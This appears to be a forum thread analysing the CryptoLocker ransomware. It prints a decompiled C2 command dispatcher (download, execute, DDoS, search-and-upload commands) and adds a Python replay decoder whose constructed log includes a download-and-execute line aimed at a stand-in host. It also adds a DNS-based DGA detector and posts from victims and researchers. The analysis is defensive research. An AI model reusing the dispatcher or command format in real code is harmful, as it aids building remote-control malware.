Grinler wrote:Yes, thanks, I already tried it successfully :) MAXS wrote:Anyone got this sample? I am pretty sure this is CryptoLocker 2.0, posted above.
http://blog.trendmicro.com/trendlabs-se ... le-drives/
// Decompiled excerpt of the sample's C2 command dispatcher; identifiers such as
// string_2 and method_14 are decompiler-generated. Each command arrives as one
// line: a keyword followed by '|'-separated arguments, and the whole line is
// handed to the matching handler after Split('|').
// Note the test order: "download" is checked before "downloadandexecute", so a
// "downloadandexecute|..." line is caught by the "download" branch and reaches
// method_12 with the execute flag false; the later branch is unreachable.
string result;
try
{
    string_2 = string_2.Trim();
    // Session terminator: "[end]" anywhere in the line, case-insensitive
    // (the keyword tests below are case-sensitive StartsWith).
    if (string_2.ToLower().Trim().Contains("[end]"))
    {
        result = "finalized";
        return result;
    }
    // writeregistry|...
    if (string_2.StartsWith("writeregistry"))
    {
        string[] string_3 = string_2.Split(new char[] { '|' });
        result = Conversions.ToString(this.method_14(string_3));
        return result;
    }
    // ddose|...  (name suggests a DDoS task)
    if (string_2.StartsWith("ddose"))
    {
        string[] string_4 = string_2.Split(new char[] { '|' });
        result = this.method_13(string_4);
        return result;
    }
    // download|...  (method_12 with execute = false)
    if (string_2.StartsWith("download"))
    {
        string[] string_5 = string_2.Split(new char[] { '|' });
        result = this.method_12(string_5, false);
        return result;
    }
    // execute|...
    if (string_2.StartsWith("execute"))
    {
        string[] string_6 = string_2.Split(new char[] { '|' });
        result = this.method_11(string_6);
        return result;
    }
    // downloadandexecute|...  (method_12 with execute = true; shadowed by the
    // "download" branch above, so this block is never reached)
    if (string_2.StartsWith("downloadandexecute"))
    {
        string[] string_7 = string_2.Split(new char[] { '|' });
        result = this.method_12(string_7, true);
        return result;
    }
    // disallowshutdown|...
    if (string_2.StartsWith("disallowshutdown"))
    {
        string[] string_8 = string_2.Split(new char[] { '|' });
        result = this.method_10(string_8);
        return result;
    }
    // searchupload|...  (name suggests searching for files and uploading them)
    if (string_2.StartsWith("searchupload"))
    {
        string[] string_9 = string_2.Split(new char[] { '|' });
        result = this.method_9(string_9);
        return result;
    }
    // showmessage|...
    if (string_2.StartsWith("showmessage"))
    {
        string[] string_10 = string_2.Split(new char[] { '|' });
        result = this.method_8(string_10);
        return result;
    }
    // enablesockets|...
    if (string_2.StartsWith("enablesockets"))
    {
        string[] string_11 = string_2.Split(new char[] { '|' });
        result = Conversions.ToString(this.method_7(string_11));
        return result;
    }
    // (the remainder of the handler, including the catch block, was not included in the post)
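As an added example (not code from the post or from the sample), here is an offline Python decoder that mirrors the dispatch rules of the decompiled handler above: Trim, a case-insensitive Contains("[end]") check, then case-sensitive StartsWith tests in the sample's order. It lets an analyst replay a captured command log and see which handler each line would reach without executing anything. The handler labels, the `%TEMP%` placeholder and the sample log lines are assumed/constructed; the sample's own obfuscated method_N names are not reproduced.

```python
"""Offline decoder for the '|'-delimited C2 command lines handled by the
decompiled dispatcher above. Added example; handler labels are descriptive
names chosen here, not the sample's method_N identifiers."""

# Keyword -> (handler label, execute flag), in the SAME order the sample
# tests them. Order matters: "download" precedes "downloadandexecute", so the
# longer keyword is shadowed and its lines go to the download-only handler.
DISPATCH_ORDER = [
    ("writeregistry", "write_registry", None),
    ("ddose", "ddos", None),
    ("download", "download", False),
    ("execute", "execute", None),
    ("downloadandexecute", "download", True),
    ("disallowshutdown", "disallow_shutdown", None),
    ("searchupload", "search_upload", None),
    ("showmessage", "show_message", None),
    ("enablesockets", "enable_sockets", None),
]


def route(line):
    """Return (handler, args, execute_flag) for one command line.

    ('finalized', [], None) when the terminator is present anywhere in the
    line (Contains, case-insensitive, exactly like the sample), and
    (None, [], None) when no keyword matches (the sample falls through).
    The sample passes the whole Split('|') array to the handler; here the
    keyword itself is dropped from args for readability."""
    line = line.strip()
    if "[end]" in line.lower().strip():
        return ("finalized", [], None)
    for keyword, handler, flag in DISPATCH_ORDER:
        if line.startswith(keyword):          # case-sensitive, like StartsWith
            parts = line.split("|")
            return (handler, parts[1:], flag)
    return (None, [], None)


def shadowed_keywords(order=DISPATCH_ORDER):
    """Keywords that can never match because an earlier keyword is a prefix."""
    seen, shadowed = [], []
    for keyword, _, _ in order:
        if any(keyword.startswith(s) for s in seen):
            shadowed.append(keyword)
        seen.append(keyword)
    return shadowed


def replay(lines):
    """Route every line of a captured command log, stopping at the terminator."""
    decisions = []
    for line in lines:
        decision = route(line)
        decisions.append((line, decision))
        if decision[0] == "finalized":
            break
    return decisions


# Constructed sample log (not real C2 traffic); note the mixed-case lines.
SAMPLE_LOG = [
    "  showmessage|Your files have been encrypted|Warning  ",
    "downloadandexecute|http://example.invalid/payload.exe|%TEMP%\\p.exe",
    "DOWNLOAD|http://example.invalid/x",
    "enablesockets|1",
    "[END]",
    "execute|calc.exe",          # never reached: the session ended above
]

if __name__ == "__main__":
    for line, (handler, args, flag) in replay(SAMPLE_LOG):
        print(f"{line.strip()!r:60} -> {handler} args={args} flag={flag}")
    print("shadowed:", shadowed_keywords())
```

Running it shows the "downloadandexecute" line landing in the download-only handler with the execute flag false, the upper-case "DOWNLOAD" line matching nothing, and "[END]" ending the replay before the "execute" line is looked at.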
I have been attacked by a virus where all my Excel, Word, music files have been encrypted. My restore also states that it has been unable to complete. When I first turned my computer on I received a message saying all my files were encrypted and sent to the police and that I would have to send £100 to get them unencrypted. I am not very computer literate, so if there is a fix I would need to have clear, simple, detailed steps. I hope you can help as I desperately need a couple of my Excel files.
thisisu wrote:Can someone please take a look at this file and let me know what type of malware it came from?CryptoLocker. You can easily determine it yourself:
Fabian Wosar wrote:I wrote a small tool to scan for CryptoLocker files or determine if a specific file is encrypted by CryptoLocker based on the above check. I use it mostly to quickly determine if files that victims sent me are encrypted by CryptoLocker or not, as most users just send encrypted files and ask for help. If there is any interest in it, I can share it with you guys.I'm interested. Thank you for reviewing the file. :)
AliveNoMore wrote:I still can't run CryptoLocker. I've created a special VM for malware without additions, renamed devices and registry keys. What am I doing wrong? How are guys testing it?CryptoLocker is not VM aware. Most likely your infection has a hard time finding a valid C2 server as the vast majority of domains generated by the DGA are sinkholed. Just run a sniffer on the host and check if excessive DNS traffic is taking place. If it is, the malware desperately tries to find a C2 server.
AliveNoMore wrote:I still can't run CryptoLocker. I've created a special VM for malware without additions, renamed devices and registry keys. What am I doing wrong? How are guys testing it?
Fabian Wosar wrote:CryptoLocker is not VM aware. Most likely your infection has a hard time finding a valid C2 server as the vast majority of domains generated by the DGA are sinkholed. Just run a sniffer on the host and check if excessive DNS traffic is taking place. If it is, the malware desperately tries to find a C2 server.
Hm, thought it would actually be VM aware. Anyway, I suppose the only thing I can do to test it is to just let it run and hope it would manage to find a C2 server that isn't sinkholed, which could take quite a while?
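The "run a sniffer and look for excessive DNS traffic" check from the exchange above, turned into detection logic as an added example (not from the posts): a DGA hunting for a live C2 shows up as one host querying many distinct, never-repeated domains, most of which either fail with NXDOMAIN or resolve to a sinkhole. The log format, thresholds, sinkhole address and all domain names below are assumed or constructed, and the pseudo-random labels are placeholders, not the real CryptoLocker DGA.

```python
"""Flag hosts whose DNS behaviour looks like a DGA searching for a C2 server.
Added example; log format, thresholds, sinkhole list and sample data are
assumed/constructed."""
import hashlib
import re
from collections import defaultdict

# Assumed log format, one query per line:  <ts> <client> <qname> <rcode> [<answer-ip>]
LINE_RE = re.compile(
    r"^(\S+)\s+(\S+)\s+(\S+)\s+(NOERROR|NXDOMAIN|SERVFAIL)(?:\s+(\S+))?$")

# Constructed placeholder; a real deployment would load the sinkhole ranges it trusts.
SINKHOLE_IPS = {"192.0.2.1"}


def registered_domain(qname):
    """Crude 'last two labels'; real code would consult the public suffix list."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse(lines):
    """Yield (client, registered_domain, failed) for each well-formed line.
    A lookup counts as failed if it did not return NOERROR or if the answer
    is a known sinkhole address (sinkholed DGA domains still 'resolve')."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        _ts, client, qname, rcode, answer = m.groups()
        failed = rcode != "NOERROR" or answer in SINKHOLE_IPS
        yield client, registered_domain(qname), failed


def score_clients(lines, min_queries=20, max_repeat_ratio=0.2, min_fail_ratio=0.7):
    """Return {client: stats} for clients that trip all three heuristics:
    enough queries, almost no repeated domains, and mostly failed/sinkholed answers."""
    stats = defaultdict(lambda: {"queries": 0, "failed": 0, "domains": set()})
    for client, domain, failed in parse(lines):
        st = stats[client]
        st["queries"] += 1
        st["failed"] += failed
        st["domains"].add(domain)
    flagged = {}
    for client, st in stats.items():
        q = st["queries"]
        if q < min_queries:
            continue
        repeat_ratio = 1 - len(st["domains"]) / q
        fail_ratio = st["failed"] / q
        if repeat_ratio <= max_repeat_ratio and fail_ratio >= min_fail_ratio:
            flagged[client] = {"queries": q, "unique_domains": len(st["domains"]),
                               "fail_ratio": round(fail_ratio, 2)}
    return flagged


def build_sample_log():
    """Constructed sample, not real traffic: 10.0.0.5 looks up three ordinary
    names repeatedly; 10.0.0.9 churns through 30 distinct pseudo-random names,
    of which 24 fail outright and 3 resolve to the sinkhole address."""
    lines = []
    for i in range(25):
        name = ["www.example.com", "mail.example.com", "cdn.example.net"][i % 3]
        lines.append(f"2013-11-01T10:00:{i:02d} 10.0.0.5 {name} NOERROR 93.184.216.34")
    for i in range(30):
        label = hashlib.sha1(f"constructed-{i}".encode()).hexdigest()[:12]
        tld = [".com", ".net", ".org", ".biz", ".ru", ".info"][i % 6]
        if i % 10 == 0:                      # 0, 10, 20: sinkholed
            lines.append(f"2013-11-01T10:01:{i:02d} 10.0.0.9 {label}{tld} NOERROR 192.0.2.1")
        elif i % 10 == 5:                    # 5, 15, 25: genuine answer
            lines.append(f"2013-11-01T10:01:{i:02d} 10.0.0.9 {label}{tld} NOERROR 198.51.100.7")
        else:                                # everything else: NXDOMAIN
            lines.append(f"2013-11-01T10:01:{i:02d} 10.0.0.9 {label}{tld} NXDOMAIN")
    return lines


if __name__ == "__main__":
    for client, st in score_clients(build_sample_log()).items():
        print(f"{client}: {st}")
```

Only 10.0.0.9 is flagged: 30 queries, 30 unique registered domains, 27 of them failed or sinkholed. Counting sinkhole answers as failures is what keeps the heuristic working against a family like this one, where, as noted above, most of the generated domains resolve but to sinkholes rather than to a live C2.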
tjcoder wrote:Just thought I'd add this for completeness: http://www.zdnet.com/cryptolockers-crim ... 000024579/When Crilock infects a computer it generates a new bitcoin address. Only in the beginning were they using static addresses.
They are using only 3 bitcoin addresses since the first infection; literally every bitcoin transaction is publicly logged by multiple parties, including ones to exchanges and every single one leaving these 3 addresses, yet they've cashed out literally tens of millions of USD and nobody knows who they are or even where on earth they are located. Someone is extremely lazy or hiding something, and it's not the authors of this malware.